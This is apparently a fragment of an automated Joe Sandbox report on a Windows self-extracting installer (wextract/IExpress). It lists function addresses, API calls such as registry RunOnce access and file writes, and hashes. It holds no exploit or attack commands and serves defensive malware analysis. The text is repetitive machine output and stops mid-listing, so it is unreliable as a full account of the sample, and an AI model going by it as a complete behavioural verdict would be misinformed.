                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                                            • API String ID: 2833751637-1610346413
                                                                                                                                                                                                                                                            • Opcode ID: 621372e670e64a7589d853b7f44e338f14f366ac311565feded837a77af1eb62
                                                                                                                                                                                                                                                            • Instruction ID: c0bed0c306ace6c787ec50843fe035ba868e23440dbd28a443d55c310b252d56
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 621372e670e64a7589d853b7f44e338f14f366ac311565feded837a77af1eb62
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0621A435900AE4DFDB339B12DD8976977B8AB14754F05036AE8455E2E0CFB06C84CB40
                                                                                                                                                                                                                                                            Function 003E1FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,003E538C,?,?,003E538C), ref: 003E2005
                                                                                                                                                                                                                                                            • RegDeleteValueA.KERNELBASE(003E538C,wextract_cleanup2,?,?,003E538C), ref: 003E2017
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(003E538C,?,?,003E538C), ref: 003E2020
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                                                                            • API String ID: 849931509-3354236729
                                                                                                                                                                                                                                                            • Opcode ID: 8c5f14f1b9ac378e60f75f83250c60f6c6d9aff91fb667dba50df1f5c038cb2e
                                                                                                                                                                                                                                                            • Instruction ID: 212bf7affdfebc90b66c68730e21be0c026df6e4cf5fca06f8ca63dd5c9265d0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c5f14f1b9ac378e60f75f83250c60f6c6d9aff91fb667dba50df1f5c038cb2e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8E04F319503A8BBD7339B92EC8AF5A7B2DF701740F100394F908A40E1EB617E14E605
                                                                                                                                                                                                                                                            Function 003E4169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,003E30B4), ref: 003E4189
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,003E30B4), ref: 003E41E7
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 003E4554
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                            • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                                            • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                                            • Opcode ID: 098a02e25086c93026d7d15711dc0d389d5cba1abddc58ca4c53390361468b82
                                                                                                                                                                                                                                                            • Instruction ID: 89b816712337410a652e2d4d694ff0e026352d5045988da2be5aa30ed0a0d7f8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 098a02e25086c93026d7d15711dc0d389d5cba1abddc58ca4c53390361468b82
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F01D1B53002B47BFB271A678C86FBB218EDBDC795F014325B705E95C09AB8DC414175
                                                                                                                                                                                                                                                            Function 003E4CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 003E4DB5
                                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 003E4DDD
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AttributesFileItemText
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                                            • API String ID: 3625706803-1610346413
                                                                                                                                                                                                                                                            • Opcode ID: abe108a8da025a7603d6a9d687ba56d12111c178492dca8fcb453f7e7564d54b
                                                                                                                                                                                                                                                            • Instruction ID: 48c8960df22f2a904d25c7a154211f11c6f63bfbdd3a16c97c1dc4933fc4d2e1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abe108a8da025a7603d6a9d687ba56d12111c178492dca8fcb453f7e7564d54b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F04126366001A59BCB238F2ADD447F673A9EB8D300F154769D8829B6C2DA31DE46C790
                                                                                                                                                                                                                                                            Function 003E4C37 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 003E4C54
                                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003E4C66
                                                                                                                                                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 003E4C7E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2071732420-0
                                                                                                                                                                                                                                                            • Opcode ID: 0fac67975e7c6035fa602ca9a38d373e93d21d9951fdd561c90661ccffed8e86
                                                                                                                                                                                                                                                            • Instruction ID: 4c95d6287f784f2fa7f1928215d5d35915ffd4b62acdccfa9cd7643926d502c4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0fac67975e7c6035fa602ca9a38d373e93d21d9951fdd561c90661ccffed8e86
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EEF0627250125CBB9B26DFA6CC489FB77ACEB0C344B44072AA415C20D0EA30F914D761
                                                                                                                                                                                                                                                            Function 003E487A Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,003E4A23,?,003E4F67,*MEMCAB,00008000,00000180), ref: 003E48DE
                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,003E4F67,*MEMCAB,00008000,00000180), ref: 003E4902
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                            • Opcode ID: 0c7b21e62dbfdef5b6b4d005b1e5b40e464944718f0f48ffe8ba2a05b67719e1
                                                                                                                                                                                                                                                            • Instruction ID: 4b788196f5258f0e2454750387a64e06fcaf728ba37859ae6517cbf8dee5d0de
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c7b21e62dbfdef5b6b4d005b1e5b40e464944718f0f48ffe8ba2a05b67719e1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0016DA3E115B026F326402A4C88FB7551CCBDA734F1B0334BDEAEB1D2D6A55C0491E0
                                                                                                                                                                                                                                                            Function 003E4AD0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 003E3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 003E369F
                                                                                                                                                                                                                                                              • Part of subcall function 003E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003E36B2
                                                                                                                                                                                                                                                              • Part of subcall function 003E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003E36DA
                                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 003E4B05
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1084409-0
                                                                                                                                                                                                                                                            • Opcode ID: 51cd4fd802f0bed0d485f76b0f79219554b8b2233a1c30a13603f50e37aa0dfe
                                                                                                                                                                                                                                                            • Instruction ID: c371c5b8afd4776e8b0e5f44262d5bc79b09c345c6d6b61c18978a56a13ae6cc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51cd4fd802f0bed0d485f76b0f79219554b8b2233a1c30a13603f50e37aa0dfe
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7018031600295ABDB278F6ADC85BA2775EF748725F058325F9799F5E0CB70D811CB40
                                                                                                                                                                                                                                                            Function 003E658A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CharPrevA.USER32(003E8B3E,003E8B3F,00000001,003E8B3E,-00000003,?,003E60EC,003E1140,?), ref: 003E65BA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CharPrev
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 122130370-0
                                                                                                                                                                                                                                                            • Opcode ID: 4fd6d907d199019e02df5719740c3d1ddbaec8349c664c6c745ae54faabeb1ff
                                                                                                                                                                                                                                                            • Instruction ID: c3cb716f2bce9e0cbc2c89dd0915ffb721521d42364ee23f9ad64d8fe32b1c5b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fd6d907d199019e02df5719740c3d1ddbaec8349c664c6c745ae54faabeb1ff
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8F02D323042F09BD333051B9884B67BFDD9BA7390F15075EE8DA872C5CA655C4583A4
                                                                                                                                                                                                                                                            Function 003E621E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003E623F
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 003E4554
                                                                                                                                                                                                                                                              • Part of subcall function 003E6285: GetLastError.KERNEL32(003E5BBC), ref: 003E6285
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 381621628-0
                                                                                                                                                                                                                                                            • Opcode ID: bb4d8a2799904716d9aee0c9cfa3f94dabdd76f89b4de077493155d1c26b4dda
                                                                                                                                                                                                                                                            • Instruction ID: 193334d4c2f2397c09b0737564ee8052f4d978c8d7da4e9fa06a0c9dd4c2611c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb4d8a2799904716d9aee0c9cfa3f94dabdd76f89b4de077493155d1c26b4dda
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCF0B470704258ABD761EB758D43BBE36ACDB54340F40066ABA85DE1C2DD749D448650
                                                                                                                                                                                                                                                            Function 003E66AE Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,003E4777,?,003E4E38,?), ref: 003E66B1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                            • Opcode ID: 85834e32486aee6998deac5e1e69641dd6d342bbb7d9b67a727f0a1e950d2eee
                                                                                                                                                                                                                                                            • Instruction ID: 50cf9d6ed66763d205c2bce9c882333f3e1a27e20928be4402165764feed3e95
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85834e32486aee6998deac5e1e69641dd6d342bbb7d9b67a727f0a1e950d2eee
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2B09276232890426A2216326C6A5562845A6D133ABE62B94F032C01E0CA3ED946D004
                                                                                                                                                                                                                                                            Function 003E4B60 Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?,00000000,00000000,?,003E4FA1,00000000), ref: 003E4B98
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                            • Opcode ID: 75b994dcbd305fbffc4f86217846420301cdb20ec0a445ca64b768176572ea54
                                                                                                                                                                                                                                                            • Instruction ID: 7b24c564b8126aed72475650f18eb86eb6e35d900a4051cc468051f7bace89ff
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75b994dcbd305fbffc4f86217846420301cdb20ec0a445ca64b768176572ea54
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27F01231D00B9D9E4773DF3ACC10653BBE8BA953603100B2EA4AED21D0DB31A852EB91
                                                                                                                                                                                                                                                            Function 003E4CA0 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000000,?), ref: 003E4CAA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocGlobal
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3761449716-0
                                                                                                                                                                                                                                                            • Opcode ID: 34b8f9d7fdf39783525bd78b2f04e4aa8cd0c06a7b27a13603abc81f37ec30aa
                                                                                                                                                                                                                                                            • Instruction ID: 863fe4b4e3085d8f48376dd4e68296d028fd8597b8e6129c5cc4b1fb152cef0b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34b8f9d7fdf39783525bd78b2f04e4aa8cd0c06a7b27a13603abc81f37ec30aa
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80B0123304424CB7CF111FC2EC09FC53F1DE7C4761F150000F60C490908A72A9108696
                                                                                                                                                                                                                                                            Function 003E4CC0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2979337801-0
                                                                                                                                                                                                                                                            • Opcode ID: 70e49948fcf122634faae32073da075278f2280bfdc10bfb30205b5f4996cda8
                                                                                                                                                                                                                                                            • Instruction ID: d56c6e9cec4d7dbb63178589ca63003b7cf06f030d6f2cd8f4b14a29d3f5cc43
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70e49948fcf122634faae32073da075278f2280bfdc10bfb30205b5f4996cda8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1AB0123100014CB78F111B42EC088853F1DD6C0370B000010F50C450218B33AC118585

                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                            Function 003E5C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CharNextA.USER32(?,00000000,?,?), ref: 003E5CEE
                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(003E8B3E,00000104,00000000,?,?), ref: 003E5DFC
                                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 003E5E3E
                                                                                                                                                                                                                                                            • CharUpperA.USER32(-00000052), ref: 003E5EE1
                                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 003E5F6F
                                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 003E5FA7
                                                                                                                                                                                                                                                            • CharUpperA.USER32(-0000004E), ref: 003E6008
                                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 003E60AA
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,003E1140,00000000,00000040,00000000), ref: 003E61F1
                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 003E61F8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
